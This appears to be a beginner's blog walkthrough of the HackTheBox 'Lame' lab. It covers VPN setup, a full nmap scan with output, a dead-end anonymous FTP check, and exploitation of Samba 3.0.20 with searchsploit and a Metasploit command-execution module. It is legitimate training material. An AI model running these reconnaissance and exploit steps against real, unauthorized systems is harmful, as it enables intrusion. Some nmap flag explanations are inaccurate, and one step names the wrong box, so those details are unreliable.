Lame is Cool

calendar Jun 4, 2022 · 6 min read · HTB CTF_Walkthrough  ·
Share on: linkedin copy

Clever titles for days. This walkthough of the Lame box is another begginner friendly entry level HTB. We'll explore a little anonymous FTP, and find out more about Samba. You can find the walkthrough video down below!

Startup

This is an entry level beginner freindley box, so the walkthrough is going to be the same. With that being said, the first step that other walkthoughs always skip over is spinning up the box and getting connected. While it is easy once you know how to do it if you don't know how you'll never be able to get started. Feel free to skip to the next section if you already know how to do this.

HTB has 2 options when it comes to completing their boxes. You can spin up a machine via HTB, or connect your own using OpenVPN. I prefer to connect my because of the customizations and different tools I have on my Kali machine, but if you want here is where to find the HTB Attack Box.

The first step if you are connecting via OpenVPN is to first make sure you have OpenVPN installed on your device. Either start typing the command see if it autofills, or if using Kali run:

1sudo apt install openvpn

Once you are sure is installed in the same place where you see the attack box you can select OpenVPN. Change the server if desired and then download the file. Find the file location and run the following command:

1openvpn insert/filepath/here

After you have connected you may have to refresh the page in order for the connect box to turn green and show your HTB IP. After that the last step is to find the Jerry box and start it up.

Heads Up

That IP in the green box will be the IP you use for yourself during interactions with this box. Do not use your actual IP.

Intelligence Gathering

The first thing I always like to do is run NMap. Here is the NMap scan I ran and a breakdown of the flags I used.

1nmap -sT -sV -Pn -p- -A -T3 tar.get.ip.add -oA /home/kali/HTB/WU/Lame/nmap/scans
NMAP Flags

-sT = TCP Connect() Scan

-sV = OS Version

-Pn = Scan all ports, and don't ping. (Scans ports no matter what)

-p- = All ports

-A = All

-T3 = Speed level. (Options 1-5 with 1 being slowest and 5 fastest)

-oA = output namp in the three formatss to the specified file path.

While that is running let's go ahead and see if we can find anything at the IP. Open up a web browser and put in the target machines IP address. We don't get any results, but we'll check a couple of the usual directories just in case. I searched around using /admin /login /user /signin /contact and got nothing, so lets dive in to those NMap results.

 1Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-04 22:53 EDT
 2Nmap scan report for 10.10.10.3
 3Host is up (0.033s latency).
 4Not shown: 65530 filtered tcp ports (no-response)
 5PORT     STATE SERVICE     VERSION
 621/tcp   open  ftp         vsftpd 2.3.4
 7|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
 8| ftp-syst: 
 9|   STAT: 
10| FTP server status:
11|      Connected to 10.10.14.9
12|      Logged in as ftp
13|      TYPE: ASCII
14|      No session bandwidth limit
15|      Session timeout in seconds is 300
16|      Control connection is plain text
17|      Data connections will be plain text
18|      vsFTPd 2.3.4 - secure, fast, stable
19|_End of status
2022/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
21| ssh-hostkey: 
22|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
23|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
24139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
25445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
263632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
27Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
28Aggressive OS guesses: DD-WRT v24-sp1 (Linux 2.4.36) (92%), OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC5) (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%)
29No exact OS matches for host (test conditions non-ideal).
30Network Distance: 2 hops
31Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
32
33Host script results:
34|_smb2-time: Protocol negotiation failed (SMB2)
35| smb-security-mode: 
36|   account_used: <blank>
37|   authentication_level: user
38|   challenge_response: supported
39|_  message_signing: disabled (dangerous, but default)
40| smb-os-discovery: 
41|   OS: Unix (Samba 3.0.20-Debian)
42|   Computer name: lame
43|   NetBIOS computer name: 
44|   Domain name: hackthebox.gr
45|   FQDN: lame.hackthebox.gr
46|_  System time: 2022-06-04T22:55:49-04:00
47|_clock-skew: mean: 2h00m06s, deviation: 2h49m45s, median: 3s
48
49TRACEROUTE (using proto 1/icmp)
50HOP RTT      ADDRESS
511   32.78 ms 10.10.14.1
522   32.81 ms 10.10.10.3
53
54OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
55Nmap done: 1 IP address (1 host up) scanned in 176.96 seconds

So we've got two items that really catch my eye in that NMap scan. Item one is the port 21 Anonymous FTP, and item two is the Samba ports 139 and 445. Lets start off by looking into port 21 first.

Port 21 - Anonymous FTP

In the NMap scan the first thing that should catch your eye is that port 21 FTP is allowing Anonymous FTP. Anonymous FTP essentially means we can log in wihout having a username or password. We will connect using the user name anonymous with no password.

1ftp anonymous@tar.get.ip.add
Heads Up

The username being used is the one before the @ sign.

Once you get in there you can do some snooping, but you're not able to find anything. Just to cover your bases login using ftp as the user too. Unfourtaenly, there is nothing there either. It appears anonymous FTP was a red herring. That's okay though, because we have another open port to check!

Port 139/445 - Samba

First off what is Samba? Port 139 and 445 are SMB and used for file transfer, and back in the day it used to run on top of NetBIOS. Now days port 445 TCP can use it for file transfer. When looking for this specific version you do find that there is an exploit for it. This is the perfect time to introduce searchsploit.

1searchsploit samba 3.0.2

When doing that we see several exploits, but the one we'll focus on is:

Searchploit Result

Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb

Now that we've found an exploit it's time to... exploit!

Exploiting the Vulnerablity

From our searchsploit result we see we can use this exploit via Metasploit. Lets get it spun up and dive in.

1msfconsole

Once you have it started we can get it set up.

Metasploit Setup

1- Use show options

2-Set the rhost as the target IP (set rhost tar.get.ip.add)

3-Set the lhost as your IP (set lhost your.HTB.ip.add)(The IP given to you via HTB (it's in the green box))

4-Use exploit (exploit OR run)

It works!! Now time to dig around and find the flags. I'll leave that part for you, but feel free to message me if you need a hand!

Walkthrough Video